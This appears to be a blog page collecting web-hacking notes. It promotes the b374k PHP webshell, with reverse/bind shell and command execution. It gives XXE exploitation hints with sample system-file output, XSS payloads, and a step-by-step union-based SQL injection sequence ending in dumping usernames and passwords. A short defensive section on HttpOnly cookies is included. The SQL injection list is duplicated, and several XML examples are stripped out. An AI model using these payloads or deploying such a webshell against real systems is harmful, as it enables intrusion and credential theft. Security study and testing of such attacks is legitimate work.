PHP per-directory INI settings
Most of the configuration variables can be set on a per-directory basis. This can be used when you have a single web server that is serving multiple applications, and:
for more info
- You want to use a different application name for each of those applications.
- You want to tweak certain settings on an application by application basis.
for more info
b374k-PHP shell
PHP Webshell with many features such as :
- File manager (view, edit, rename, delete, upload, download as archive,etc)
- Command execution
- Script execution (php, perl, python, ruby, java, node.js, c)
- Give you shell via bind/reverse shell connect
- Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more using ODBC or PDO)
- Process list/Task manager
- API to control this shell within another scripts/programs (see wiki)
- All of that only in 1 file, no installation needed
- Support PHP v4 and v5
- Search function (ver 2.4)
- Hex editor (ver 2.4)
- SQL Explorer (ver 2.4)
Protecting Your Cookies: HttpOnly
What is HttpOnly?
According to the Microsoft Developer Network, HttpOnly is an additional flag included in a Set-Cookie HTTP response header. Using the HttpOnly flag when generating a cookie helps mitigate the risk of client side script accessing the protected cookie (if the browser supports it).- The example below shows the syntax used within the HTTP response header:
Set-Cookie:= [; = ] [; expires= ][; domain= ] [; path= ][; secure][; HttpOnly]
If the HttpOnly flag (optional) is included in the HTTP response header, the cookie cannot be accessed through client side script (again if the browser supports this flag). As a result, even if a cross-site scripting (XSS) flaw exists, and a user accidentally accesses a link that exploits this flaw, the browser (primarily Internet Explorer) will not reveal the cookie to a third party.
If a browser does not support HttpOnly and a website attempts to set an HttpOnly cookie, the HttpOnly flag will be ignored by the browser, thus creating a traditional, script accessible cookie. As a result, the cookie (typically your session cookie) becomes vulnerable to theft of modification by malicious script.
Using PHP to set HttpOnly
PHP supports setting the HttpOnly flag since version 5.2.0 (November 2006).For session cookies managed by PHP, the flag is set either permanently in php.ini PHP manual on HttpOnly through the parameter:
session.cookie_httponly = Trueor in and during a script via the function
void session_set_cookie_params ( int $lifetime [, string $path [, string $domain
[, bool $secure= false [, bool $httponly= false ]]]] )
For application cookies last parameter in setcookie() sets HttpOnly flag
bool setcookie ( string $name [, string $value [, int $expire= 0 [, string $path
[, string $domain [, bool $secure= false [, bool $httponly= false ]]]]]] )
Web Server
Implement in Apache:
1. Ensure you have mod_headers.so enabled in Apache instance2. Add following entry in httpd.conf
Header edit Set-Cookie ^(.*)$ $1;HttpOnly;Secure3. Restart Apache Web Server
Note: Header edit is not compatible with lower than Apache 2.2.4 version. You can use following to set HttpOnly and Secure flag in lower than 2.2.4 version. Thanks to Ytse for sharing this information.
Header set Set-Cookie HttpOnly;Secure
Verification:
Open your website with HTTP Watch, Live HTTP Header or HTTP Header Online tool.Check HTTP response header, you should see as highlighted
Secure your web application today!
Read - Apache Web Server Security & Hardening Guide - Practical Guide
XML External Entity Attack Hints
Overview
XML External Entity Attack may result when an application allows an input parameter to be XML or incorporated into XML which is passed to an XML parser running with sufficient privileges to include external or system files.
Discovery Methodology
Attempt to inject XML or reserved characters into input parameters and observe if XML parsing errors are generated.
For web services, check each input parameter specified in the WSDL document for those of type XML.
Exploitation
Use information disclosed in error messages to determine at what file path the XML parser is parsing. Cause errors to occur using malformed XML, XML that starts with whitespace or null characters, and XML that does not meet the XSL specification.
Also try to load files that dont exist in order to determine operating system type and the path at which interpretation is taking place.
Example
XML is well-known for containing data (text nodes) which are marked-up by tags (element nodes). XML has the ability to have place-holders called entities. Web developers often used pre-defined entities without realizing they are using an XML entity. For example the less than symbol < can be represented by the pre-defined entity <. The < entity is defined in the parser itself. There is no need to declare the < before using it. However developers are allowed to declare their own entities. XML documents also contain a mechanism by which they can import and include external files as part of themselves. The imported file will be included into the XML docment whereever the entity exists.
Here are some examples to try
Valid XML without entities
Hello World
XML with the predefined " entity
"Hello World"
XML with the user defined myEntity entity
XML with multiple user defined entities
]>The section of an XML document optionally defines external files to be included as part of the XML document. Interestingly these can even be files from the system parsing the XML.
To declare an external entity, the directive defines the resource represented and the symbol that will represent the entity. In this example, the type of entity is a local system resource as indicated by the "SYSTEM" type, the resource is a local file (./robots.txt), and the symbol that represents the entity is "systemEntity". Entities do not have to be external but in this example the system file happens to be an external resource. Entities can also be strings or other local variables.
The XML parser will import the file. The file can be output into the XML document by placing the symbol in the document preceded by an ampersand (&) and followed by a semicolon (;).
&systemEntity;
In an external entity attack, XML is injected or uploaded to the site in an effort to get the XML parser import the injected entity into the XML, then output the contents of the entity.
]>
If the web server is misconfigured or given too many privileges, the XML parser can import operating system files. This example works on many Windows systems.
]>
The output will look similar to the following
[boot loader] timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP
Professional" /fastdetect /NoExecute=OptIn ;
Other injections are possible. This version uses injected comment symbols to alter XML. This is useful for filter bypass.
Hello World <!--
NJ
This is a slightly different version of XXE to fetch the robots.txt.
]>
&systemEntity; ;
This injection results in a cross site script.
$lDOMDocument->textContent=<![CDATA[<]]>script<![CDATA[>]]>alert('XSS')<![CDATA[<]]>/script<![CDATA[>]]>
This injection also results in a cross site script.
<script>alert("Hello
World")</script>
Some SQL Injection
1. ?id=1
2. ?id=1' --+
3. ?id=1' Order by 1 --+
4. ?id=-1' union select 1,2,database() --+
5. ?id=-1' union select 1,version(),database() --+
6. ?id=-5' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 2,1--+
7. ?id=-5' union select 1,column_name,3 from information_schema.columns where table_name="users"--+
8. ?id=-5' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users"--+
9. ?id=-5' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name="users"--+
10. ?id=-5' union select 1,group_concat(username), group_concat(password) from users--+
2. ?id=1' --+
3. ?id=1' Order by 1 --+
4. ?id=-1' union select 1,2,database() --+
5. ?id=-1' union select 1,version(),database() --+
6. ?id=-5' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 2,1--+
7. ?id=-5' union select 1,column_name,3 from information_schema.columns where table_name="users"--+
8. ?id=-5' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users"--+
9. ?id=-5' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name="users"--+
10. ?id=-5' union select 1,group_concat(username), group_concat(password) from users--+
Subscribe to:
Posts
(
Atom
)
No comments :
Post a Comment